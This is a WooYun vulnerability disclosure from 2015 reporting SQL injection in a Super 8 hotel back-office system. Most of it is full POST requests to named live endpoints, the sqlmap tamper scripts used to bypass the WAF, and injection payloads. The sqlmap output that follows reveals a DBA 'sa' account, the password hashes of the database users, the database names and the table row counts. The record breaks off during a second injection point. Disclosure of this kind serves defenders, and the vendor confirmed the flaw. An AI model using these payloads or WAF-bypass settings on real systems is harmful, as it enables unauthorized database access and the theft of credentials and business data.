当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138076

漏洞标题:速8酒店某后台管理系统存在SQL注入可绕过waf(DBA权限+数十万数据泄漏)

相关厂商:速8酒店

漏洞作者: 路人甲

提交时间:2015-08-31 11:15

修复时间:2015-10-15 12:12

公开时间:2015-10-15 12:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-31: 细节已通知厂商并且等待厂商处理中
2015-08-31: 厂商已经确认,细节仅向厂商公开
2015-09-10: 细节向核心白帽子及相关领域专家公开
2015-09-20: 细节向普通白帽子公开
2015-09-30: 细节向实习白帽子公开
2015-10-15: 细节向公众公开

简要描述:

不修改,那就可以进入后台测试测试了!~~~

详细说明:

WooYun: 速8酒店某后台管理系统存在弱口令(可修改所有酒店地址/负责人/应商等信息)
这里洞主已经列出了,可以可修改所有酒店地址/负责人/应商等信息,我就不来了,我来个后台找找注入的地方!
加--tamper between.py,randomcase.py,space2comment.py --dbms "Microsoft SQL Server"测试
1、第一处:新闻分类管理搜索

http://mys8.super8.com.cn:81/pages/bs/newstype/bs_newstypemanage.aspx (POST)
ctl00$ctl00$ScriptManager1=ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$UpdatePanel1|
ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$btnQuery&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$cbI
sRecursionEX=on&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedSearch
$txtWatermarked=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedSearch
$TextBoxWatermarkExtender1_ClientState=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ddlParent=0&ctl00$ctl00
$ContentPlaceHolder1$ContentPlaceHolder2$txtNewsTypeName=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txt
State=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtTheOrder=&ctl00$ctl00$ContentPlaceHolder1$ContentPlac
eHolder2$txtRemark=&__EVENTTARGET=ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$btnQuery&__EVENTARGUME
NT=&__VIEWSTATE=/wEPDwULLTEwMTEwNTkzNDkPFgIeCUFjdGlvblNJRAUgNUE1RjZDOTAzOUQzNDkzRUE4NTcwRDg4QjBD
NTcxNjMWAmYPZBYCZg9kFgICAw9kFgICBg9kFgICAw9kFgICAQ9kFgJmD2QWBgIBD2QWCgIDDw8WAh4HRW5hYmxlZGdkZAI
FDw8WAh8BaGRkAgcPDxYCHwFnZGQCCQ8PFgIfAWdkZAIPD2QWAmYPZBYCAgMPFgIeDVdhdGVybWFya1RleHQFFeivt%2Bi
%2Bk
%2BWFpeafpeivouadoeS7tmQCAw88KwAJAgAPFgYeDU5ldmVyRXhwYW5kZWRkHgxTZWxlY3RlZE5vZGUFN0NvbnRlbnRQbGFjZ
UhvbGRlcjFfQ29udGVudFBsYWNlSG9sZGVyMl90dkJTX05ld3NUeXBldDIeCUxhc3RJbmRleAIFZAgUKwADBQcwOjAsMDoxFCsAAh
YIHgRUZXh0BQzkuIvovb3kuK3lv4MeBVZhbHVlBSA4RDk2NDc5M0M1MDE0QTdCQTFCQjU2MUJBNDQxMTNGNB4ISW1hZ2VVc
mwFMX4vQ29yZVJlc291cmNlL0ltYWdlcy9TeXN0ZW1NYW5hZ2UvVHJlZU5vZGUwMS5naWYeCEV4cGFuZGVkZxQrAAMFBzA6M
CwwOjEUKwACFgofBgUM5bi455So6LWE5rqQHwcFIDJFRjlDRjI5N0NDNDQ3N0Q5NUUwQkQ4N0M1Mjc1NzVEHwgFMX4vQ29y
ZVJlc291cmNlL0ltYWdlcy9TeXN0ZW1NYW5hZ2UvVHJlZU5vZGUwMy5naWYfCWgeCFNlbGVjdGVkaGQUKwACFgofBgUM5qCH5
YeG6KeE6IyDHwcFIDVBNUY2QzkwMzlEMzQ5M0VBODU3MEQ4OEIwQzU3MTYzHwgFMX4vQ29yZVJlc291cmNlL0ltYWdlcy9TeX
N0ZW1NYW5hZ2UvVHJlZU5vZGUwMy5naWYfCWgfCmdkFCsAAhYIHwYFBuaWsOmXux8HBSBCMDEyRjc1MUZBMDU0QzlBQjU
wMUVGODdBNTZFOURDRh8IBTF
%2BL0NvcmVSZXNvdXJjZS9JbWFnZXMvU3lzdGVtTWFuYWdlL1RyZWVOb2RlMDEuZ2lmHwlnFCsAAgUDMDowFCsAAhYKHwYFK
TxkaXYgc3R5bGU9J2NvbG9yOlJlZCc%2B6Zeo5oi35paw6Ze7PC9kaXY
%2BHwcFIDRBNzVBNzNCMEU2QzRCQkY4QzIxMkY0OEQ4MkM0OTcyHwgFMX4vQ29yZVJlc291cmNlL0ltYWdlcy9TeXN0ZW1NY
W5hZ2UvVHJlZU5vZGUwMy5naWYfCWgfCmhkZAIHD2QWAgIDD2QWAgIBDxAPFggeDkRhdGFWYWx1ZUZpZWxkBQpOZXdzV
HlwZUlEHg1EYXRhVGV4dEZpZWxkBQxOZXdzVHlwZU5hbWUeKkVzb2Z0X19TbWFydFRyZWVEcm9wRG93bkxpc3RfX1Jvb3RQYXJ
lbnRJRAUBMB4qRXNvZnRfX1NtYXJ0VHJlZURyb3BEb3duTGlzdF9fUGFyZW50Q29sdW1uBRBQYXJlbnROZXdzVHlwZUlEZBAVBQ0t
Leivt%2BmAieaLqS0tD%2BKVi%2BS4i
%2Bi9veS4reW/gxHilJxb5bi455So6LWE5rqQXRHilJxb5qCH5YeG6KeE6IyDXQnilYvmlrDpl7sVBQEwIDhEOTY0NzkzQzUwMTRBN0JB
MUJCNTYxQkE0NDExM0Y0IDJFRjlDRjI5N0NDNDQ3N0Q5NUUwQkQ4N0M1Mjc1NzVEIDVBNUY2QzkwMzlEMzQ5M0VBODU3M
EQ4OEIwQzU3MTYzIEIwMTJGNzUxRkEwNTRDOUFCNTAxRUY4N0E1NkU5RENGFCsDBWdnZ2dnFgFmZBgBBR5fX0NvbnRyb2xz
UmVxdWlyZVBvc3RCYWNrS2V5X18WAwVDY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2
xkZXIyJGNiSXNSZWN1cnNpb25FWAVBY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZX
IyJHR2QlNfTmV3c1R5cGUFPmN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRpYnRuQ
2FuY2Vs5U07fMf61YDhod3h/%2BOeNsTVqVFjG5HJllpepuJ8uDs
%3D&ContentPlaceHolder1_ContentPlaceHolder2_tvBS_NewsType_ExpandState=ennen&ContentPlaceHolder1_ContentPlaceHo
lder2_tvBS_NewsType_SelectedNode=ContentPlaceHolder1_ContentPlaceHolder2_tvBS_NewsTypet2&ContentPlaceHolder1_Con
tentPlaceHolder2_tvBS_NewsType_PopulateLog=&__ASYNCPOST=true&


ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedSearch$txtWatermarked存在注入。

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedSearc
h$txtWatermarked
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ctl00$ctl00$ScriptManager1=ctl00$ctl00$ContentPlaceHolder1$ContentP
laceHolder2$UpdatePanel1|ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$btn
Query&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$cbIsRecursionEX=on&ctl
00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedSearch$txtWatermark
ed=1%' AND 2881=2881 AND '%'='&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolde
r2$wtxtAdvancedSearch$TextBoxWatermarkExtender1_ClientState=&ctl00$ctl00$Content
PlaceHolder1$ContentPlaceHolder2$ddlParent=0&ctl00$ctl00$ContentPlaceHolder1$Con
tentPlaceHolder2$txtNewsTypeName=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHo
lder2$txtState=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtTheOrder=
&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtRemark=&__EVENTTARGET=ct
l00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$btnQuery&__EVENTARGUMENT=&__VI
EWSTATE=/wEPDwULLTEwMTEwNTkzNDkPFgIeCUFjdGlvblNJRAUgNUE1RjZDOTAzOUQzNDkzRUE4NTcw
RDg4QjBDNTcxNjMWAmYPZBYCZg9kFgICAw9kFgICBg9kFgICAw9kFgICAQ9kFgJmD2QWBgIBD2QWCgID
Dw8WAh4HRW5hYmxlZGdkZAIFDw8WAh8BaGRkAgcPDxYCHwFnZGQCCQ8PFgIfAWdkZAIPD2QWAmYPZBYC
AgMPFgIeDVdhdGVybWFya1RleHQFFeivt+i+k+WFpeafpeivouadoeS7tmQCAw88KwAJAgAPFgYeDU5l
dmVyRXhwYW5kZWRkHgxTZWxlY3RlZE5vZGUFN0NvbnRlbnRQbGFjZUhvbGRlcjFfQ29udGVudFBsYWNl
SG9sZGVyMl90dkJTX05ld3NUeXBldDIeCUxhc3RJbmRleAIFZAgUKwADBQcwOjAsMDoxFCsAAhYIHgRU
ZXh0BQzkuIvovb3kuK3lv4MeBVZhbHVlBSA4RDk2NDc5M0M1MDE0QTdCQTFCQjU2MUJBNDQxMTNGNB4I
SW1hZ2VVcmwFMX4vQ29yZVJlc291cmNlL0ltYWdlcy9TeXN0ZW1NYW5hZ2UvVHJlZU5vZGUwMS5naWYe
CEV4cGFuZGVkZxQrAAMFBzA6MCwwOjEUKwACFgofBgUM5bi455So6LWE5rqQHwcFIDJFRjlDRjI5N0ND
NDQ3N0Q5NUUwQkQ4N0M1Mjc1NzVEHwgFMX4vQ29yZVJlc291cmNlL0ltYWdlcy9TeXN0ZW1NYW5hZ2Uv
VHJlZU5vZGUwMy5naWYfCWgeCFNlbGVjdGVkaGQUKwACFgofBgUM5qCH5YeG6KeE6IyDHwcFIDVBNUY2
QzkwMzlEMzQ5M0VBODU3MEQ4OEIwQzU3MTYzHwgFMX4vQ29yZVJlc291cmNlL0ltYWdlcy9TeXN0ZW1N
YW5hZ2UvVHJlZU5vZGUwMy5naWYfCWgfCmdkFCsAAhYIHwYFBuaWsOmXux8HBSBCMDEyRjc1MUZBMDU0
QzlBQjUwMUVGODdBNTZFOURDRh8IBTF+L0NvcmVSZXNvdXJjZS9JbWFnZXMvU3lzdGVtTWFuYWdlL1Ry
ZWVOb2RlMDEuZ2lmHwlnFCsAAgUDMDowFCsAAhYKHwYFKTxkaXYgc3R5bGU9J2NvbG9yOlJlZCc+6Zeo
5oi35paw6Ze7PC9kaXY+HwcFIDRBNzVBNzNCMEU2QzRCQkY4QzIxMkY0OEQ4MkM0OTcyHwgFMX4vQ29y
ZVJlc291cmNlL0ltYWdlcy9TeXN0ZW1NYW5hZ2UvVHJlZU5vZGUwMy5naWYfCWgfCmhkZAIHD2QWAgID
D2QWAgIBDxAPFggeDkRhdGFWYWx1ZUZpZWxkBQpOZXdzVHlwZUlEHg1EYXRhVGV4dEZpZWxkBQxOZXdz
VHlwZU5hbWUeKkVzb2Z0X19TbWFydFRyZWVEcm9wRG93bkxpc3RfX1Jvb3RQYXJlbnRJRAUBMB4qRXNv
ZnRfX1NtYXJ0VHJlZURyb3BEb3duTGlzdF9fUGFyZW50Q29sdW1uBRBQYXJlbnROZXdzVHlwZUlEZBAV
BQ0tLeivt+mAieaLqS0tD+KVi+S4i+i9veS4reW/gxHilJxb5bi455So6LWE5rqQXRHilJxb5qCH5YeG
6KeE6IyDXQnilYvmlrDpl7sVBQEwIDhEOTY0NzkzQzUwMTRBN0JBMUJCNTYxQkE0NDExM0Y0IDJFRjlD
RjI5N0NDNDQ3N0Q5NUUwQkQ4N0M1Mjc1NzVEIDVBNUY2QzkwMzlEMzQ5M0VBODU3MEQ4OEIwQzU3MTYz
IEIwMTJGNzUxRkEwNTRDOUFCNTAxRUY4N0E1NkU5RENGFCsDBWdnZ2dnFgFmZBgBBR5fX0NvbnRyb2xz
UmVxdWlyZVBvc3RCYWNrS2V5X18WAwVDY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250
ZW50UGxhY2VIb2xkZXIyJGNiSXNSZWN1cnNpb25FWAVBY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9s
ZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJHR2QlNfTmV3c1R5cGUFPmN0bDAwJGN0bDAwJENvbnRlbnRQ
bGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRpYnRuQ2FuY2Vs5U07fMf61YDhod3h/+OeNsTV
qVFjG5HJllpepuJ8uDs=&ContentPlaceHolder1_ContentPlaceHolder2_tvBS_NewsType_Expan
dState=ennen&ContentPlaceHolder1_ContentPlaceHolder2_tvBS_NewsType_SelectedNode=
ContentPlaceHolder1_ContentPlaceHolder2_tvBS_NewsTypet2&ContentPlaceHolder1_Cont
entPlaceHolder2_tvBS_NewsType_PopulateLog=&__ASYNCPOST=true&
---
[09:22:41] [WARNING] changes made by tampering scripts are not included in shown
payload content(s)
[09:22:41] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[09:22:41] [INFO] fetching current user
[09:22:41] [INFO] retrieving the length of query output
[09:22:41] [INFO] resumed: 2
[09:22:41] [INFO] resumed: sa
current user: 'sa'
[09:22:41] [INFO] fetching current database
[09:22:41] [INFO] retrieving the length of query output
[09:22:41] [INFO] resumed: 8
[09:22:41] [INFO] resumed: super8db
current database: 'super8db'
[09:22:41] [INFO] testing if current user is DBA
you provided a HTTP Cookie header value. The target URL provided its own cookies
within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n] n
[09:22:43] [WARNING] reflective value(s) found and filtering out
current user is DBA: True
database management system users [4]:
[*] ##MS_PolicyEventPr
[*] ##MS_PolicyTsqlExecutionLogin##
[*] myportal
[*] sa
do you want to store hashes to a temporary file for eventual further processing
with other tools [y/N] n
do you want to perform a dictionary-based attack against retrieved password hash
es? [Y/n/q] n
database management system users password hashes:
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
password hash: 0x0100b81612821c70d559c0381392a3e18659339515484385335f
header: 0x0100
salt: b8161282
mixedcase: 1c70d559c0381392a3e18659339515484385335f
[*] myportal [1]:
password hash: 0x01009b9f7553fbbca05677c781d8f3fd97fbe9b0326479c217ad
header: 0x0100
salt: 9b9f7553
mixedcase: fbbca05677c781d8f3fd97fbe9b0326479c217ad
[*] sa [1]:
password hash: 0x01002c6503ef9f84039673d6f5b1c6faa41f019ae40963430d2c
header: 0x0100
salt: 2c6503ef
mixedcase: 9f84039673d6f5b1c6faa41f019ae40963430d2c
available databases [9]:
[*] master
[*] model
[*] msdb
[*] ReportServer$SQL2008
[*] ReportServer$SQL2008TempDB
[*] su8
[*] super8db
[*] super8dbTest
[*] tempdb
Database: super8db
+--------------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------------+---------+
| dbo.BN_StoreItemValueHis | 168405 |
| dbo.BN_StoreItemValue | 34335 |
| dbo.BN_EvaluateActivityFranchiseStoreProjectContent | 14950 |
| dbo.DataOperateLogDetail | 12240 |
| dbo.BN_EvaluateActivityFranchiseStoreProject | 6578 |
| dbo.BN_PunishmentActivityFranchiseStoreProjectRule | 3564 |
| dbo.BehaviorLog | 2875 |
| dbo.BN_PunishmentActivityFranchiseStoreProject | 2376 |
| dbo.Log_StaffLoginHis | 2110 |
| dbo.BN_PunishmentActivityFranchiseStore | 1960 |
| dbo.BN_EvaluateActivityFranchiseStore | 1884 |
| dbo.DataOperateLog | 1554 |
| dbo.BS_Area | 1300 |
| dbo.BS_FranchiseStore | 776 |
| dbo.BS_FranchiseStore2 | 508 |
| dbo.BN_BusinessFile | 337 |
| dbo.BN_File | 337 |
| dbo.BN_Su8CoinChangeDetail | 295 |
| dbo.BN_ConvertApply | 287 |
| dbo.RolePermission | 281 |
| dbo.BS_GoodsType | 206 |
| dbo.BS_EvaluateProjectContent | 151 |
| dbo.Link | 132 |
| dbo.bak_Link_20141201 | 127 |
| dbo.BS_Goods | 125 |
| dbo.bak_Link_20140827 | 124 |
| dbo.bak_Link_0626 | 123 |
| dbo.bak_Link_0731 | 122 |
| dbo.bak_Link | 120 |
| dbo.bak_Link_20140613 | 120 |
| dbo.BS_EvaluateProject | 98 |
| dbo.bak_Link_0313 | 90 |
| dbo.Permission | 83 |
| dbo.Module | 81 |
| dbo.bak_Permission_20141201 | 80 |
| dbo.bak_Module_20141201 | 78 |
| dbo.bak_Permission_20140827 | 78 |
| dbo.bak_Permission_0626 | 77 |
| dbo.bak_Permission_0731 | 77 |
| dbo.bak_Module_20140827 | 76 |
| dbo.bak_Permission_20140613 | 76 |
| dbo.bak_Module_0626 | 75 |
| dbo.bak_Module_0731 | 75 |
| dbo.bak_Module_20140613 | 74 |
| dbo.bak_RolePermission | 73 |
| dbo.bak_Permission | 70 |
| dbo.BS_StoreItem | 69 |
| dbo.UserRole | 62 |
| dbo.bak_Permission_0313 | 61 |
| dbo.bak_Module_0313 | 59 |
| dbo.WS_Dynamic | 55 |
| dbo.BS_DataDictionary | 54 |
| dbo.BN_EvaluateActivityProjectContent | 53 |
| dbo.BS_Supplier | 48 |
| dbo.BN_Notice | 42 |
| dbo.BS_SupplierType | 40 |
| dbo.BS_ComplaintType | 37 |
| dbo.BN_DepartmentNotice | 34 |
| dbo.BN_ConvertApply123 | 25 |
| dbo.BN_EvaluateActivityRuleSection | 23 |
| dbo.BN_EvaluateActivityProject | 22 |
| dbo.BN_ConvertProject | 20 |
| dbo.BS_PunishmentProjectRule | 19 |
| dbo.Role | 19 |
| dbo.BN_BusinessFormData | 18 |
| dbo.BN_PunishmentActivityProjectRule | 16 |
| dbo.BS_Department | 15 |
| dbo.PermissionCategory | 15 |
| dbo.bak_PermissionCategory | 14 |
| dbo.bak_PermissionCategory_0313 | 13 |
| dbo.BS_Staff | 13 |
| dbo.BN_Albums | 12 |
| dbo.BS_EvaluateScoringCriteria | 12 |
| dbo.BN_Complaint | 11 |
| dbo.BN_DepartmentInfo | 11 |
| dbo.BN_StoreQuestion | 11 |
| dbo.BN_TimeFlag | 11 |
| dbo.BS_DataDictionaryType | 11 |
| dbo.WS_News | 11 |
| dbo.ForgetPassword | 10 |
| dbo.BN_DepartmentSection | 9 |
| dbo.BN_FormChildItem | 9 |
| dbo.BN_ToDoListHistory | 9 |
| dbo.BS_EvaluateCriteria | 8 |
| dbo.SSO | 8 |
| dbo.BN_ConvertAuditLog | 7 |
| dbo.BN_PunishmentActivityProject | 6 |
| dbo.BN_PunishmentActivityRuleSection | 6 |
| dbo.BS_DynamicType | 6 |
| dbo.PC_ShoppingCartDetail | 6 |
| dbo.BN_ConvertActivityRuleSection | 5 |
| dbo.BS_NewsType | 5 |
| dbo.BS_StoreType | 5 |
| dbo.BN_DepartmentSectionDetail | 4 |
| dbo.BN_AlbumsType | 3 |
| dbo.BN_ConvertActivity | 3 |
| dbo.BN_ConvertActivityRule | 3 |
| dbo.BN_EvaluateActivity | 3 |
| dbo.BN_FormItem | 3 |
| dbo.BN_PunishmentActivity | 3 |
| dbo.BN_PunishmentActivityRule | 3 |
| dbo.BS_PunishmentProject | 3 |
| dbo.PC_PurchasingOrderDetail | 3 |
| dbo.RoleCategory | 3 |
| dbo.WS_MessageHis | 3 |
| dbo.BN_ComplaintCase | 2 |
| dbo.BN_EvaluateActivityFranchiseStoreAppeal | 2 |
| dbo.BN_EvaluateActivityFranchiseStoreProjectContentLog | 2 |
| dbo.BN_EvaluateActivityRule | 2 |
| dbo.BN_FormColumn | 2 |
| dbo.BN_Su8CoinAdjustment | 2 |
| dbo.BN_ToDoList | 2 |
| dbo.BS_FranchiseStoreStaff | 2 |
| dbo.BN_BusinessForm | 1 |
| dbo.BN_Form | 1 |
| dbo.BS_Franchisee | 1 |
| dbo.BS_QuestionnaireMould | 1 |
| dbo.BS_QuestionnaireMouldQuestion | 1 |
| dbo.BS_QuestionnaireMouldQuestionAnswer | 1 |
| dbo.PC_PurchasingOrder | 1 |
| dbo.PC_ShoppingCart | 1 |
| dbo.SubSystem | 1 |
| dbo.WS_Message | 1 |
| dbo.WS_Settings | 1 |
+--------------------------------------------------------+---------+


2、自定义表单管理(高级查询)

http://mys8.super8.com.cn:81/pages/bn/form/bn_formmanage.aspx (POST)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMjA3ODgzNDEyMw8WBB4KUXVlcnlTdGF0ZQspZVN1cGV
yOC5FbnRpdHkuQ29tbW9uLlF1ZXJ5U3RhdGUsIFN1cGVyOC5FbnRpdHksIFZlcnNpb249MS4wLjAuMCwgQ3VsdHVyZT1uZXV0cm
FsLCBQdWJsaWNLZXlUb2tlbj1udWxsAB4OT3JkZXJDb25kaXRpb24FGFN0YXRlIERFU0MsVGhlT3JkZXIgREVTQxYCZg9kFgJmD2Q
WAgIDD2QWAgIGD2QWAgIDD2QWCAIBD2QWDAIDDw8WAh4HRW5hYmxlZGhkZAIFDw8WAh8CaGRkAgcPDxYCHwJoZGQCC
Q8PFgIfAmhkZAILDw8WAh8CaGRkAhUPDxYCHg1XYXRlcm1hcmtUZXh0BRXor7fovpPlhaXmn6Xor6LmnaHku7ZkFgJmD2QWAgI
DDxYCHwMFFeivt%2Bi%2Bk
%2BWFpeafpeivouadoeS7tmQCAw88KwARAwAPFgoeC18hRGF0YUJvdW5kZx4Icm93Q291bnQCAR4RSXNFbXB0eURhdGFTb3Vy
Y2VnHgtfIUl0ZW1Db3VudGYeL0Vzb2Z0X19TbWFydEdyaWRWaWV3X19TbWFydFJhZGlvQnV0dG9uR3JvdXBOYW1lBRZTbWFydFJ
hZGlvQnV0dG9uQ29sdW1uZAEQFgAWABYADBQrAAAWAmYPZBYIAgEPZBYSZg8PFgIeBFRleHRlZGQCAQ8PFgIfCWVkZAICDw8
WAh8JZWRkAgMPDxYCHwllZGQCBA8PFgIfCWVkZAIFDw8WAh8JZWRkAgYPDxYCHwllZGQCBw8PFgIfCWVkZAIIDw8WAh8JZW
RkAgIPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHwpoZGQCBA9kFgJmD2QWAmYPZBYCZg9kFgICAQ9kFgICAg9kFghmDw8WAh8
CaGRkAgEPDxYCHwJoZGQCAg8PFgIfAmhkZAIDDw8WAh8CaGRkAgcPZBYCAgMPZBYCZg9kFgICAw9kFgYCBQ9kFgRmDw8WA
h4eRXNvZnRfX1NtYXJ0Q2FsZW5kYXJfX1RhcmdldElEBQdzY1JpZ2h0ZGQCAg8PFgIfCwUGc2NMZWZ0ZGQCBw9kFgRmDw8WAh
8LBQdzY1JpZ2h0ZGQCAg8PFgIfCwUGc2NMZWZ0ZGQCDw8QDxYGHg1EYXRhVGV4dEZpZWxkBQVWYWx1ZR4ORGF0YVZhbH
VlRmllbGQFBVZhbHVlHwRnZBAVDA0tLeivt%2BmAieaLqS0tCeW3suWIoOmZpAnlt7LlgZznlKgJ5bey5ZCv55SoCeWPr%2Be8lui
%2BkQnlt7LnlJ/mlYgJ5b6F5a6h5qC4CeW3suWuoeaguAnlt7Lmi5Lnu50J5pyq5a6M5oiQCeW3suWujOaIkAnlt7Lmj5DkuqQVDAAJ
5bey5Yig6ZmkCeW3suWBnOeUqAnlt7LlkK/nlKgJ5Y%2Bv57yW6L6RCeW3sueUn
%2BaViAnlvoXlrqHmoLgJ5bey5a6h5qC4CeW3suaLkue7nQnmnKrlrozmiJAJ5bey5a6M5oiQCeW3suaPkOS6pBQrAwxnZ2dnZ2dnZ
2dnZ2dkZAIND2QWAgIDD2QWAmYPZBYCAgMPZBYEAgEPEGQQFQYM6KGo5Y2V5ZCN56ewBuaPj
%2Bi/sAzliJvlu7rml7bpl7QS5pyA5ZCO5L%2Bu5pS55pe26Ze0EuWIm%2BW7uueUqOaIt
%2BWQjeensBjmnIDlkI7kv67mlLnnlKjmiLflkI3np7AVBghGb3JtTmFtZQtEZXNjcmlwdGlvbgpDcmVhdGVUaW1lDkxhc3RNb2RpZnl
UaW1lDkNyZWF0ZVVzZXJOYW1lEkxhc3RNb2RpZnlVc2VyTmFtZRQrAwZnZ2dnZ2dkZAILDxBkDxYCZgIBFgIQBQ7nirbmgIEgIOW
AkuW6jwUFU3RhdGVnEAUR5o6S5bqP5Y
%2B3ICDlgJLluo8FCFRoZU9yZGVyZ2RkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYIBUFjdGwwMCRjdGwwMCRDb2
50ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkY2JBbGxvd1BhZ2luZwVFY3RsMDAkY3RsMDAkQ29udGVudFBsYWN
lSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGlidG5BZHZhbmNlZFF1ZXJ5BUBjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb
2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkaWJ0bk9yZGVyaW5nBUBjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvb
nRlbnRQbGFjZUhvbGRlcjIkbGJPcmRlcmluZ05vBT5jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZU
hvbGRlcjIkcmJ0bkFzY2VuZAU
%2BY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJHJidG5Bc2NlbmQFP2N0bDAwJG
N0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRyYnRuRGVzY2VuZAVBY3RsMDAkY3RsMDAkQ29u
dGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGxiT3JkZXJpbmdZZXMFPWN0bDAwJGN0bDAwJENvbnRlbnRQb
GFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJOX0Zvcm0PPCsADAEIAgFkrfnn7xrKbVNcmtfpEsNY77UTlUtql7qfbaSw
GxuOZPM%3D&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery
$txtWatermarked=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery
$TextBoxWatermarkExtender1_ClientState=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$cbAllowPaging=on&ctl00
$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$hfOrdering=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$Ord
er=rbtnDescend&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=State&ctl00$ctl00$ContentPlaceHold
er1$ContentPlaceHolder2$lbOrderingYes=TheOrder&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$hfAdvancedQuer
y=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtFormName=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlace
Holder2$txtDescription=2&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scLeft=2015-07-
28&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scRight=2015-08-
11&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastModifyTime$scLeft=2015-08-
05&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastModifyTime$scRight=2015-08-
06&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtCreateUserName=3&ctl00$ctl00$ContentPlaceHolder1$Content
PlaceHolder2$txtLastModifyUserName=4&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder
$scLeft=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder
$scRight=5&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ddlState=&ctl00$ctl00$ContentPlaceHolder1$ContentPlac
eHolder2$btnOKAdvancedQuery=%E7%A1%AE%E5%AE%9A


ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtFormName、
ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtDescription、
ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtCreateUserName、
ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtLastModifyUserName均存在注入

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtFormName
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMjA3ODgzNDEyMw8
